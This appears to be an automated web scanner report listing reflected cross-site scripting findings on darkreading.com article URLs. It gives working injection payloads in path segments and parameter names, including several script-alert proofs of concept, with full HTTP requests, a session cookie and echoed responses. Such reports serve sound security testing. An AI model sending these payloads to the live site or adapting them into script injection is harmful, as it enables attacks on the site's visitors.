The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c577d"><a>94a75e1b53f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/222301500c577d"><a>94a75e1b53f/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f24e"><a>9952baf063f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/222301500/index.html7f24e"><a>9952baf063f HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 422fa'><a>dbb8496f8ab was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/222301500/index.html422fa'><a>dbb8496f8ab HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>7 Steps F ...[SNIP]... <input type='hidden' name='article_url' value='http://www.darkreading.com/security/article/222301500/index.html422fa'><a>dbb8496f8ab'> ...[SNIP]...
3.465. http://www.darkreading.com/security/article/222301500/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/222301500/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11e54"><script>alert(1)</script>cb2acc93382 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/222301500/index.html?11e54"><script>alert(1)</script>cb2acc93382=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d216"><a>86d0a27d402 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article5d216"><a>86d0a27d402/222600139/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fb9f"><a>6d0ba98f5f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/2226001392fb9f"><a>6d0ba98f5f/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1177e'><a>9fad5a2ee64 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/222600139/index.html1177e'><a>9fad5a2ee64 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5481"><a>bfd0c8b2b1e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/222600139/index.htmle5481"><a>bfd0c8b2b1e HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Anatomy O ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F222600139%2Findex.htmle5481%22%3E%3Ca%3Ebfd0c8b2b1e&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/222600139/index.htmle5481"><a>bfd0c8b2b1e"> ...[SNIP]...
3.470. http://www.darkreading.com/security/article/222600139/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/222600139/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 955f0"><script>alert(1)</script>8eb4f22c5e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/222600139/index.html?955f0"><script>alert(1)</script>8eb4f22c5e2=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 521e6"><a>d6c237c7913 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article521e6"><a>d6c237c7913/222900286/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74c1c"><a>1737c6c3840 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/22290028674c1c"><a>1737c6c3840/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... in?service=http%3A%2F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F22290028674c1c%22%3E%3Ca%3E1737c6c3840%2F0&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/22290028674c1c"><a>1737c6c3840/0"> ...[SNIP]...
3.473. http://www.darkreading.com/security/article/222900286/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/222900286/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804ba"><script>alert(1)</script>c868625e475 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/222900286/index.html?804ba"><script>alert(1)</script>c868625e475=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da08d"><a>9c0f9238d45 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/articleda08d"><a>9c0f9238d45/222900775/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 166b2"><a>1616c0893ee was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/222900775166b2"><a>1616c0893ee/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aa3e3'><a>dba39d2ca02 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/222900775/index.htmlaa3e3'><a>dba39d2ca02 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c035"><a>a42789bc965 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/222900775/index.html4c035"><a>a42789bc965 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>U.S. Fail ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F222900775%2Findex.html4c035%22%3E%3Ca%3Ea42789bc965&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/222900775/index.html4c035"><a>a42789bc965"> ...[SNIP]...
3.478. http://www.darkreading.com/security/article/222900775/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/222900775/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c557"><script>alert(1)</script>79601a0615d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/222900775/index.html?8c557"><script>alert(1)</script>79601a0615d=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6411"><a>81184b615aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/articlea6411"><a>81184b615aa/223100233/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df64a"><a>08e0295c605 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/223100233df64a"><a>08e0295c605/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a1d1"><a>09bcd80775f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/223100233/index.html9a1d1"><a>09bcd80775f HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2be6c'><a>b925cb4d757 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/223100233/index.html2be6c'><a>b925cb4d757 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Criminals ...[SNIP]... <a href='http://www.darkreading.com/security/article/223100233/index.html2be6c'><a>b925cb4d757?fmid=12388'> ...[SNIP]...
3.483. http://www.darkreading.com/security/article/223100233/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/223100233/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff26f"><script>alert(1)</script>05bc0868a97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/223100233/index.html?ff26f"><script>alert(1)</script>05bc0868a97=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e655e"><a>59e03e8463 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/articlee655e"><a>59e03e8463/223100436/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32352"><a>878f86d0886 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/22310043632352"><a>878f86d0886/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 197bf'><a>2c10b2a16b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/223100436/index.html197bf'><a>2c10b2a16b1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7237d"><a>8b187b4678c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/223100436/index.html7237d"><a>8b187b4678c HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Attack Un ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F223100436%2Findex.html7237d%22%3E%3Ca%3E8b187b4678c&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/223100436/index.html7237d"><a>8b187b4678c"> ...[SNIP]...
3.488. http://www.darkreading.com/security/article/223100436/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/223100436/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 933f3"><script>alert(1)</script>24e5ab25faa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/223100436/index.html?933f3"><script>alert(1)</script>24e5ab25faa=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d3bc"><a>65696441f0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article8d3bc"><a>65696441f0b/223100902/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b65b5"><a>e64cf2b6fbc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/223100902b65b5"><a>e64cf2b6fbc/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ca50"><a>b1509081941 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/223100902/index.html9ca50"><a>b1509081941 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ce65a'><a>7efdb634037 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
